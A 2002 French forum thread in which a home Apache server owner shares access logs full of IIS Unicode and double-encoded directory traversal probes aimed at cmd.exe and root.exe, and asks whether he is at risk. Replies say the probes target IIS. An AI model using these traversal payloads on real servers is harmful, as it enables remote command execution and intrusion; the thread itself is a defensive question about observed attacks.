Serveur Apache et Faille Unicode

Serveur Apache et Faille Unicode - Windows & Software

Marsh Posté le 15-08-2002 à 01:54:21    

Bonjour a tous,
 
Je dispose d'une connexion ADSL et j'ai installé un petit serveur apache.
 
Lorsque je regarde les logs je vois ca :
 

Citation :

80.14.66.236 - - [14/Aug/2002:21:58:47 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:58:48 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:58:50 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:58:54 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:58:55 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:58:56 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:58:57 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:58:59 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:59:00 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:59:01 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:59:01 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 762
80.14.66.236 - - [14/Aug/2002:21:59:02 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 762
80.14.66.236 - - [14/Aug/2002:21:59:02 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.66.236 - - [14/Aug/2002:21:59:03 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.145.144 - - [14/Aug/2002:22:15:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 835
80.14.145.144 - - [14/Aug/2002:22:15:08 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 835
80.14.145.144 - - [14/Aug/2002:22:15:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.145.144 - - [14/Aug/2002:22:15:19 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.145.144 - - [14/Aug/2002:22:15:20 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.125.18 - - [14/Aug/2002:22:44:20 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 835
80.14.125.18 - - [14/Aug/2002:22:44:22 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 835
80.14.125.18 - - [14/Aug/2002:22:44:24 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 835
80.14.145.144 - - [14/Aug/2002:23:56:46 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 835
80.14.145.144 - - [14/Aug/2002:23:58:22 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 835


 
C'est a dire des ******* qui essaye de "hacker" et de laisser un dump ftp.
 
J'avais envie de faire un piege a con, et de configurer mon serveur pour rediriger le gars indefiniemment sur une autre page ( peut-etre avec une servlet et un tomcat).
 
Est-ce que c'est possible ?
Est-ce qu'un jour un gars peut arriver a me hacker avec ce genre de truc ?!

Reply

Marsh Posté le 15-08-2002 à 01:54:21   

Reply

Marsh Posté le 15-08-2002 à 09:23:54    

c'est plus lié a IIS si je ne me trompe.. Ensuite il doit avoir moyen de rediriger cela cherche dans la doc ce doit etre possible :D
Apres il ne cherche pas a laisser un dump en ftp la mais plutot avoir acces a ta machine

Reply

Marsh Posté le 15-08-2002 à 11:07:00    

avec apache, tu n'a rien a craindre

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed